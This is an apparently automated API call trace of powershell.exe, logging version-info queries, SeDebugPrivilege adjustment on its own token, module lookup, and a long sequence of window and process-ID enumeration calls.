	[0495.283] CoTaskMemAlloc (cb=0x66) returned 0x33c1a0
	[0495.283] lstrcpyW (in: lpString1=0x33c1a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0495.283] CoTaskMemFree (pv=0x33c1a0) 
	[0495.283] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x0, puLen=0x22db40) returned 0
	[0495.283] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x0, puLen=0x22db40) returned 0
	[0495.283] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22db48, puLen=0x22db40 | out: lplpBuffer=0x22db48*=0x0, puLen=0x22db40) returned 0
	[0495.283] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22db18, puLen=0x22db10 | out: lplpBuffer=0x22db18*=0x2aa7374, puLen=0x22db10) returned 1
	[0495.284] CoTaskMemAlloc (cb=0x204) returned 0x368fe0
	[0495.284] VerLanguageNameW (in: wLang=0x0, szLang=0x368fe0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0495.286] CoTaskMemFree (pv=0x368fe0) 
	[0495.286] VerQueryValueW (in: pBlock=0x2aa72d8, lpSubBlock="\\", lplpBuffer=0x22db68, puLen=0x22db60 | out: lplpBuffer=0x22db68*=0x2aa7300, puLen=0x22db60) returned 1
	[0496.056] GetCurrentProcessId () returned 0x1184
	[0496.093] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x22ca90 | out: lpLuid=0x22ca90*(LowPart=0x14, HighPart=0)) returned 1
	[0496.095] GetCurrentProcess () returned 0xffffffffffffffff
	[0496.096] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x22cab0 | out: TokenHandle=0x22cab0*=0x2e0) returned 1
	[0496.097] AdjustTokenPrivileges (in: TokenHandle=0x2e0, DisableAllPrivileges=0, NewState=0x2aaab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0496.099] CloseHandle (hObject=0x2e0) returned 1
	[0496.103] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1184) returned 0x2e0
	[0496.848] EnumProcessModules (in: hProcess=0x2e0, lphModule=0x2aaabb8, cb=0x200, lpcbNeeded=0x22dac8 | out: lphModule=0x2aaabb8, lpcbNeeded=0x22dac8) returned 1
	[0496.851] GetModuleInformation (in: hProcess=0x2e0, hModule=0x13f370000, lpmodinfo=0x2aaae28, cb=0x18 | out: lpmodinfo=0x2aaae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0496.852] CoTaskMemAlloc (cb=0x804) returned 0x3c3260
	[0496.852] GetModuleBaseNameW (in: hProcess=0x2e0, hModule=0x13f370000, lpBaseName=0x3c3260, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0496.852] CoTaskMemFree (pv=0x3c3260) 
	[0496.853] CoTaskMemAlloc (cb=0x804) returned 0x3c3260
	[0496.853] GetModuleFileNameExW (in: hProcess=0x2e0, hModule=0x13f370000, lpFilename=0x3c3260, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0496.853] CoTaskMemFree (pv=0x3c3260) 
	[0496.854] CloseHandle (hObject=0x2e0) returned 1
	[0496.862] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1184) returned 0x2e0
	[0496.863] GetExitCodeProcess (in: hProcess=0x2e0, lpExitCode=0x22dbf8 | out: lpExitCode=0x22dbf8*=0x103) returned 1
	[0496.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12aab088, Length=0x20000, ResultLength=0x22dbc0 | out: SystemInformation=0x12aab088, ResultLength=0x22dbc0*=0x2ee08) returned 0xc0000004
	[0496.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12acb0b8, Length=0x31608, ResultLength=0x22dbc0 | out: SystemInformation=0x12acb0b8, ResultLength=0x22dbc0*=0x2ee08) returned 0x0
	[0497.603] EnumWindows (lpEnumFunc=0x27966ac, lParam=0x0) returned 1
	[0501.140] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0501.638] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x558
	[0501.640] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0502.418] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0503.590] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0503.590] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x538
	[0504.834] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.130] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x778
	[0506.130] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x778
	[0506.130] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.130] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.130] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.130] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.130] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.130] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.131] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.131] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.131] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x460
	[0506.131] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.131] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.131] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1664
	[0506.131] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x10b4
	[0506.131] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x10ac
	[0506.132] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x10ec
	[0506.132] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1068
	[0506.132] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x17e0
	[0506.132] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x102c
	[0506.132] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x17a4
	[0506.132] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1050
	[0506.132] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1694
	[0506.132] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1770
	[0506.133] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1720
	[0506.133] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x165c
	[0506.133] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1578
	[0506.133] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x16c0
	[0506.133] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x161c
	[0506.133] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1638
	[0506.133] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x15c8
	[0506.133] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1554
	[0506.133] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1674
	[0506.133] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1520
	[0506.133] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x14bc
	[0506.134] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xf8c
	[0506.134] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe9c
	[0506.134] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1434
	[0506.134] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x14ec
	[0506.134] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xfcc
	[0506.134] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x12ac
	[0506.134] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1484
	[0506.134] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x934
	[0506.134] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc0c
	[0506.134] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xb08
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x948
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1178
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x13e0
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xcd0
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x13fc
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xdc8
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc18
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc2c
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa1c
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1244
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xdb0
	[0506.135] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1398
	[0506.136] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1358
	[0506.136] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1370
	[0506.136] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1340
	[0506.136] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x130c
	[0506.136] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x12c0
	[0506.136] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x12e4
	[0506.136] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1270
	[0506.136] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1298
	[0506.136] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x120c
	[0506.136] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x122c
	[0506.139] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x11c4
	[0506.139] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x11b0
	[0506.140] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1188
	[0506.140] GetWindow (hWnd=0x104c8, uCmd=0x4) returned 0x0
	[0506.141] IsWindowVisible (hWnd=0x104c8) returned 0
	[0506.141] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1148
	[0506.141] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1160
	[0506.141] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x10fc
	[0506.141] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe34
	[0506.141] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xea4
	[0506.141] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x514
	[0506.141] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe48
	[0506.141] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xbc8
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xdf8
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x318
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xcac
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x8bc
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xf9c
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xf48
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe40
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xecc
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xeb8
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe80
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe98
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe60
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xee4
	[0506.142] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xf00
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xdf0
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xe1c
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xdd0
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xd94
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xd74
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xd00
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xcd8
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc84
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xca4
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc64
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xc24
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xb84
	[0506.143] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xbac
	[0506.144] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x384
	[0506.144] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xab8
	[0506.144] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x33c
	[0506.144] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa44
	[0506.144] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa64
	[0506.144] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x8a8
	[0506.144] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xaf0
	[0506.144] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x88c
	[0506.144] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xb04
	[0506.144] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x910
	[0506.144] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x230
	[0506.145] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xac0
	[0506.145] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xab4
	[0506.145] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xaac
	[0506.145] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x3d0
	[0506.145] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x978
	[0506.145] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa7c
	[0506.145] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x59c
	[0506.145] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa88
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa6c
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa68
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x9f8
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xa04
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x924
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x8dc
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x7dc
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x768
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x764
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x820
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x810
	[0506.146] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x794
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x83c
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x7ac
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xb44
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0xb5c
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x838
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.147] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x4d0
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x818
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x5b8
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x494
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x1ec
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x440
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x7e8
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x730
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x2c8
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x31c
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x330
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x128
	[0506.148] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x22d920 | out: lpdwProcessId=0x22d920) returned 0x5c8
